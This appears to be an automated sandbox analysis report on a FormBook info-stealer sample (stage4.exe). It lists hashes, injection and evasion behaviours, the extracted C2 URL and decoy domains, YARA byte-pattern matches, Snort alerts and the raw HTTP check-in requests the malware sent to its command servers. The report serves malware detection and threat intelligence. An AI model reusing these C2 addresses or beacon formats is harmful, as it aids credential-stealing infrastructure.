Play interactive tour

Edit tour

Windows Analysis Report stage4.exe

Overview

General Information

Sample Name:	stage4.exe
Analysis ID:	526334
MD5:	17032a31243253b4fefeb5c6a9604c1f
SHA1:	c6b4a5a935594c61293d8d26c2b891f4c4c02bec
SHA256:	84eca147b83cc4116ebb6c34dbe60f7231c676f17152cb376d8efb913d534723
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sample uses process hollowing technique

Maps a DLL or memory area into another process

PE file has a writeable .text section

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found large amount of non-executed APIs

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

stage4.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\stage4.exe" MD5: 17032A31243253B4FEFEB5C6A9604C1F)

explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 5700 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cscript.exe (PID: 6156 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.mgav26.xyz/n8rn/"], "decoy": ["jlvip1066.com", "gconsultingfirm.com", "foundergomwef.xyz", "bredaslo.com", "ethereumpets.com", "buddymerrillmusic.com", "archdeylemmergay.com", "particulares-es.icu", "gb2022-club.com", "babypasal.com", "mlikew.com", "mskindi.com", "securewalletvalidate.com", "billstrasse24.com", "ritebet388.com", "nuhive.net", "nekomediphile.com", "jaynelsonphotog.com", "writerpilotpublishing.store", "taquerialoteria.com", "feetlover.online", "buychryslers.com", "duyol.com", "theeppunday.com", "slayfearlessly.com", "padelthiene.com", "falcongroupmanagement.com", "security-paiemet.com", "disfagiaresidencias.com", "ragworkhouse.com", "smplkindness.com", "dartsearchengine.com", "rapibest.com", "lab-design.online", "soflovrlnd.com", "pandawan.club", "purifybrush.com", "grantopwincup.website", "zenholisticstores.com", "nomarcapital.com", "thoughtultracruel.quest", "excellentdefence.com", "phillystore.net", "egregore.club", "waysgaming.com", "boliden-ab.com", "faxedfumnook.com", "ecobook.club", "ff4c75x4e.xyz", "connect01.com", "monascake.xyz", "balaga-vacances.com", "prill.quest", "princessbuilt.com", "islandresiliency.com", "dimcreadev.tech", "bspcanadaconnects.com", "hotgurlmarket.com", "spendbrasiltimebest.com", "newelectricways.com", "counterpokemon.com", "beyerenterprisestreeservice.com", "phorganicfoods.com", "hermespros.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x136a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x137a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1391f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x83aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1240c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19c4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ac9:$sqlite3step: 68 34 1C 7B E1 0x15bdc:$sqlite3step: 68 34 1C 7B E1 0x15af8:$sqlite3text: 68 38 2A 90 C5 0x15c1d:$sqlite3text: 68 38 2A 90 C5 0x15b0b:$sqlite3blob: 68 53 D8 7F 8C 0x15c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.stage4.exe.1200000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.stage4.exe.1200000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.stage4.exe.1200000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.mgav26.xyz/n8rn/"], "decoy": ["jlvip1066.com", "gconsultingfirm.com", "foundergomwef.xyz", "bredaslo.com", "ethereumpets.com", "buddymerrillmusic.com", "archdeylemmergay.com", "particulares-es.icu", "gb2022-club.com", "babypasal.com", "mlikew.com", "mskindi.com", "securewalletvalidate.com", "billstrasse24.com", "ritebet388.com", "nuhive.net", "nekomediphile.com", "jaynelsonphotog.com", "writerpilotpublishing.store", "taquerialoteria.com", "feetlover.online", "buychryslers.com", "duyol.com", "theeppunday.com", "slayfearlessly.com", "padelthiene.com", "falcongroupmanagement.com", "security-paiemet.com", "disfagiaresidencias.com", "ragworkhouse.com", "smplkindness.com", "dartsearchengine.com", "rapibest.com", "lab-design.online", "soflovrlnd.com", "pandawan.club", "purifybrush.com", "grantopwincup.website", "zenholisticstores.com", "nomarcapital.com", "thoughtultracruel.quest", "excellentdefence.com", "phillystore.net", "egregore.club", "waysgaming.com", "boliden-ab.com", "faxedfumnook.com", "ecobook.club", "ff4c75x4e.xyz", "connect01.com", "monascake.xyz", "balaga-vacances.com", "prill.quest", "princessbuilt.com", "islandresiliency.com", "dimcreadev.tech", "bspcanadaconnects.com", "hotgurlmarket.com", "spendbrasiltimebest.com", "newelectricways.com", "counterpokemon.com", "beyerenterprisestreeservice.com", "phorganicfoods.com", "hermespros.com"]}

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: www.mgav26.xyz/n8rn/	Avira URL Cloud: Label: phishing
Source: http://www.egregore.club/n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP	Avira URL Cloud: Label: phishing

Machine Learning detection for sample

Show sources

Source: stage4.exe

Joe Sandbox ML: detected

Source: stage4.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: stage4.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cscript.pdbUGP source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, cscript.exe, 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, cscript.exe
Source:	Binary string: cscript.pdb source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\stage4.exe	Code function: 4x nop then pop ebx		0_2_01206AB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop ebx		22_2_010D6AB5

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49833 -> 109.234.160.63:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49833 -> 109.234.160.63:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49833 -> 109.234.160.63:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49839 -> 168.119.175.0:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49839 -> 168.119.175.0:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49839 -> 168.119.175.0:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49843 -> 192.200.108.3:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49843 -> 192.200.108.3:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49843 -> 192.200.108.3:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 88.99.22.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 109.234.160.63 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.theeppunday.com
Source: C:\Windows\explorer.exe	Domain query: www.egregore.club
Source: C:\Windows\explorer.exe	Domain query: www.dartsearchengine.com
Source: C:\Windows\explorer.exe	Domain query: www.feetlover.online
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Performs DNS queries to domains with low reputation

Show sources

Source:

DNS query: www.mgav26.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.mgav26.xyz/n8rn/

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: O2SWITCHFR O2SWITCHFR

Source: global traffic	HTTP traffic detected: GET /n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.feetlover.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8rn/?DFNPQJ=h1fp3Hda9mAZkqRDMBzhuAsSSpfRTgMN3yh/hpwpAz6PQ27xv5wLBHD9XtakgWKnfsj5&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.dartsearchengine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.egregore.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8rn/?DFNPQJ=NdSdCS1so+jBOhKbX6Hl5r/uB2055iwTMCcKjDuiSwVFzL3wqZseOva8MEOaJLNdbnoX&Mf3=f880irxXZ4UDtxoP HTTP/1.1Host: www.gconsultingfirm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

